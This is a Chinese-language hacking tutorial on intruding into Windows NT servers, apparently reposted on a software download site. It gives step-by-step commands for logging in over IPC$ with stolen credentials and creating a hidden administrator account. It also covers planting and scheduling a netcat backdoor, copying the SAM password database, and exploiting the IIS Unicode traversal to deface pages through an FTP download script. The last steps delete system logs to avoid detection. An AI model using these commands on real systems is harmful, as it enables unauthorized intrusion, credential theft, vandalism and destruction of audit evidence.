|
導讀網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據... 網絡技術是從1990年代中期發展起來的新技術,它把互聯網上分散的資源融為有機整體,實現資源的全面共享和有機協作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計算機、存儲資源、數據資源、信息資源、知識資源、專家資源、大型數據庫、網絡、傳感器等。 當前的互聯網只限于信息共享,網絡則被認為是互聯網發展的第三階段。 一般入侵所需要的幾個常用命令,如果寫得不好別笑啊。我覺得寫這些更有用,不會像其他人一樣寫一些很無聊不現實的文章。當然這只是我的想法,我也有缺點的。 1:NET 只要你擁有某IP的用戶名和密碼,那就用IPC$做連接吧! 這里我們假如你得到的用戶是hbx,密碼是123456。假設對方IP為127.0.0.1 net use 127.0.0.1ipc$ "123456" /user:"hbx" 退出的命令是 net use 127.0.0.1ipc$ /delte 下面的*作你必須登陸后才可以用.登陸的方法就在上面. ---------------------- 下面我們講怎么創建一個用戶,由于SA的權限相當于系統的超級用戶. 我們加一個heibai的用戶密碼為lovechina net user heibai lovechina /add 只要顯示命令成功,那么我們可以把他加入Administrator組了. net localgroup Administrators heibai /add ---------------------- 這里是講映射對方的C盤,當然其他盤也可以,只要存在就行了.我們這里把對方的C盤映射到本地的Z盤. net use z:127.0.0.1c$ ---------------------- net start telnet 這樣可以打開對方的TELNET服務. ---------------------- 這里是將Guest用戶激活,guest是NT的默認用戶,而且無法刪除呢?不知道是否這樣,我的2000就是刪除不了 它。 net user guest /active:yes ---------------------- 這里是把一個用戶的密碼改掉,我們把guest的密碼改為lovechina,其他用戶也可以的。只要有權限就行了呀! net user guest lovechina net命令果然強大啊! 2:at 一般一個入侵者入侵后都會留下后門,也就是種木馬了,你把木馬傳了上去,怎么啟動他呢? 那么需要用AT命令,這里假設你已經登陸了那個服務器。 你首先要得到對方的時間, net time 127.0.0.1 將會返回一個時間,這里假設時間為12:1,現在需要新建一個作業,其ID=1 at 127.0.0.1 12:3 nc.exe 這里假設了一個木馬,名為NC.EXE,這個東西要在對方服務器上. 這里介紹一下NC,NC是NETCAT的簡稱,為了方便輸入,一般會被改名.它是一個TELNET服務,端口為99. 等到了12:3就可以連接到對方的99端口.這樣就給對方種下了木馬. 3:telnet 這個命令非常實用,它可以與遠方做連接,不過正常下需要密碼、用戶,不過你給對方種了木馬,直接連到這個木馬 打開的端口. telnet 127.0.0.1 99 這樣就可以連到對方的99端口.那你就可以在對方運行命令了,這個也就是肉雞. 4:FTP 它可以將你的東西傳到對方機子上,你可以去申請個支持FTP上傳的空間,國內多的是,如果真的找不到,我給個 http://WWW.51.NET, 不錯的.當我們申請完后,它會給用戶名,密碼,以及FTP服務器. 在上傳前需要登陸先,這里我們假設FTP服務器是 http://WWW.51.NET, 用戶名是HUCJS,密碼是654321 ftp www.51.net 他會要求輸入用戶,成功后會要求輸入密碼. ---------------------- 下面先說上傳,假設你需上傳的文件是INDEX.HTM,它位于C:下,傳到對方D: get c:index.htm d: 假設你要把對方C盤下的INDEX.HTM,下到你的機子的D盤下 put c:index.htm d: 5:copy 下面我說說怎樣把本地的文件復制到對方硬盤上去,需要建立好IPC$連接才有效。 這里我們把本地C盤下的index.htm復制到127.0.0.1的C盤下 copy index.htm 127.0.0.1c$index.htm ---------------------- 如果你要復制到D盤下把C改為D,就行了! copy index.htm 127.0.0.1d$index.htm ---------------------- 如果你要把他復制到WINNT目錄里 就要把輸入 copy index.htm 127.0.0.1admin$index.htm admin$是winnt ---------------------- 要把對方的文件復制過來,順便告訴大家NT的備份的數據庫放在x:winntrepairsam._ sam._是數據庫的文件名 下面就把127.0.0.1的數據庫復制到本地C盤下 copy 127.0.0.1admin$repairsam._ c: ---------------------- 6:set 如果你跑進了一部機子,而且想黑他(這思想只能在特別時候才準有),當然他的80端口要開,不然你黑給誰看。 這時需要用SET命令! 下面是我得到的結果!我來分析它,只是找主頁在那而已。 COMPUTERNAME=PENTIUMII ComSpec=D:WINNTsystem32cmd.exe CONTENT_LENGTH=0 GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=*/* HTTP_ACCEPT_LANGUAGE=zh-cn HTTP_CONNECTION=Keep-Alive HTTP_HOST=當前登陸者的IP,這里本來是顯示我的IP,被我刪除了 HTTP_ACCEPT_ENCODING=gzip, deflate HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt) NUMBER_OF_PROCESSORS=1 Os2LibPath=D:WINNTsystem32os2dll; OS=Windows_NT Path=D:WINNTsystem32;D:WINNT PATHEXT=.COM;.EXE;.BAT;.CMD PATH_TRANSLATED=E:vlroot主頁放在的地址,只要你看到PATH_TRANSLATED=的后面就是主頁的存放地址。這里是 E:vlroot PROCESSOR_ARCHITECTURE=x86 PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel PROCESSOR_LEVEL=6 PROCESSOR_REVISION=0303 PROMPT=$P$G QUERY_STRING=/c+set REMOTE_ADDR=XX.XX.XX.XX REMOTE_HOST=XX.XX.XX.XX REQUEST_METHOD=GET s cript_NAME=/s cripts/..%2f../winnt/system32/cmd.exe SERVER_NAME=XX.XX.XX.XX SERVER_PORT=80 SERVER_PORT_SECURE=0 SERVER_PROTOCOL=HTTP/1.1 SERVER_SOFTWARE=Microsoft-IIS/3.0對方使用IIS/3.0 SystemDrive=D: SystemRoot=D:WINNT TZ=GMT-9 USERPROFILE=D:WINNTProfilesDefault User windir=D:WINNT 粉紅色的那行就是對方主頁存放地址,這里告訴大家一個技巧,很笨的技巧啊,不過只能用這個方法才能100%的找 到主頁的名稱,當你DIR這個目錄時,一定會看到很多文件,你可以把所有文件在瀏覽器這樣輸入XX.XX.XX.XX/文 件名,這樣只要看到和XX.XX.XX.XX看到的也面一模一樣,那么這就是主頁的名稱了。 7:nbtstat 如果你掃到一部NT的機子,他的136到139其中一個端口開了的話,就要用這個命令得到用戶了。順便告訴大家這是 netbios,得到用戶名后就可以猜猜密碼了。例如比較簡單的密碼,密碼和用戶名一樣的,都試下,不行就暴力破 解吧! 現在網上很多NT的機子都開了這些端口的,你可以練習下,我們來分析得到的結果。 命令是 nbtstat -A XX.XX.XX.XX -A一定要大寫哦。 下面是得到的結果。 NetBIOS Remote Machine Name Table Name Type Status --------------------------------------------- Registered Registered Registered Registered Registered Registered Registered Reg istered Registered Registered Registered MAC Address = 00-E0-29-14-35-BA PENTIUMII <00> UNIQUE PENTIUMII <20> UNIQUE ORAHOTOWN <00> GROUP ORAHOTOWN <1C> GROUP ORAHOTOWN <1B> UNIQUE PENTIUMII <03> UNIQUE INet~Services <1C> GROUP IS~PENTIUMII...<00> UNIQUE ORAHOTOWN <1E> GROUP ORAHOTOWN <1D> UNIQUE ..__MSBROWSE__.<01> GROUP 粉紅色的就是登陸過這部系統的用戶,可能你不知道怎么看,大家是不是看到了一竄數字,只要這竄數字是<03>的 話,那他前面的就是用戶。 這里的用戶是PENTIUMII。 8:Shutdown 關了對方的NT服務器的命令 Shutdown IP地址 t:20 20秒后將NT自動關閉,三思后才能運行這個命令,這樣對對方造很大的損失,要做個有良心的入侵者呀。 9:DIR 這個命令沒什么好講,但是卻非常重要,他是查看一目錄里的所有文件、文件夾。 你可以本地試下。 10:echo 著名的漏洞Unicode,這個命令可以簡單的黑一下有這個漏洞的主機。 我們假設我們要把“南京大屠殺鐵證如山,任何日本人不得抵賴!”寫入index.htm,有2種方法,大家看看有什么 區別。 echo 南京大屠殺鐵證如山,任何日本人不得抵賴!>index.htm echo 南京大屠殺鐵證如山,任何日本人不得抵賴!>>index.htm 第一個的意思是覆蓋index.htm原有的內容,把“南京大屠殺鐵證如山,任何日本人不得抵賴!”寫進 index.htm。 第二個的意思是把“南京大屠殺鐵證如山,任何日本人不得抵賴!”加到index.htm里面。 “>>”產生的內容將追加進文件中,“>”則將原文件內容覆蓋。 大家可以本地試下。 可能你會問,這樣簡單黑下有什么好玩的,其實他可以用來下載主頁到對方的目錄里。 1、首先,我們需要申請一個免費的主頁空間。 2、用echo在可寫目錄下建立如下內容的txt文件:(以chinren服務器為例。) open upload.chinaren.com(你的FTP服務器,申請時你的空間提供商會給你的) cnhack(你申請時的用戶名) test(你申請時的密碼) get index.htm c:inetpubwwwrootindex.htm(這里是把你空間上的index.htm下載到對方的 c:inetpubwwwrootindex.htm) bye(退出FTP對話,相當在98下的DOS,用EXIT退出DOS) 具體的做法: 輸入 echo open upload.chinaren.com> c:cnhack.txt 輸入 echo cnhack >> c:cnhack.txt 輸入 echo 39abs >> c:cnhack.txt 輸入 echo get index.htm c:inetpubwwwrootindex.htm+>>+c:cnhack.txt 最后輸入 ftp -s:c:cnhack.txt (利用ftp的-s參數,執行文件里的內容。) 等命令完成時,文件已經下載到你指定的文件里了。 注意:取得文件后,請刪除cnhack.txt。(如果不刪除,很容易會給別人看到你的密碼。) 記得要 del c:cnhack.txt 11:attrib 這個命令是設置文件屬性的。如果你想黑一個站,而他的主頁的文件屬性設置了只讀,那就很可憐呀,想刪除他也 不行,想覆蓋他也不行。倒!不過有這個命令就別怕了。 attrib -r index.htm 這個命令是把index.htm的只讀屬性去掉。 如果把“-”改為“+”則是把這個文件的屬性設置為只讀 ---------------------- attrib +r index.htm 這個命令是把index.htm的屬性設置為只讀。 12:del 當你看到這個標題可別倒下啊!現在要離開127.0.0.1了,要刪除日志,當然要刪除日志啦!想被捉嗎。呵呵。 NT的日志有這些 del C:winntsystem32logfiles*.* del C:winntssytem32config*.evt del C:winntsystem32dtclog*.* del C:winntsystem32*.log del C:winntsystem32*.txt del C:winnt*.txt del C:winnt*.log 只要刪除這些就可以了。有些系統NT安裝在D盤或其他盤,就要把C改成其他盤。 網絡的神奇作用吸引著越來越多的用戶加入其中,正因如此,網絡的承受能力也面臨著越來越嚴峻的考驗―從硬件上、軟件上、所用標準上......,各項技術都需要適時應勢,對應發展,這正是網絡迅速走向進步的催化劑。 |
溫馨提示:喜歡本站的話,請收藏一下本站!
本站發布的Win7純凈版系統、Win10純凈版和XP純凈版系統僅為個人學習測試使用,請在下載后24小時內刪除,不得用于任何商業用途,否則后果自負,請支持購買微軟正版軟件!
本站所有資源全部來自于網絡資源,如侵犯到您的權益,請及時通知我們(peng896066052@126.com),我們會及時處理.
Copyright © 2018-2020 雨林木風下載站
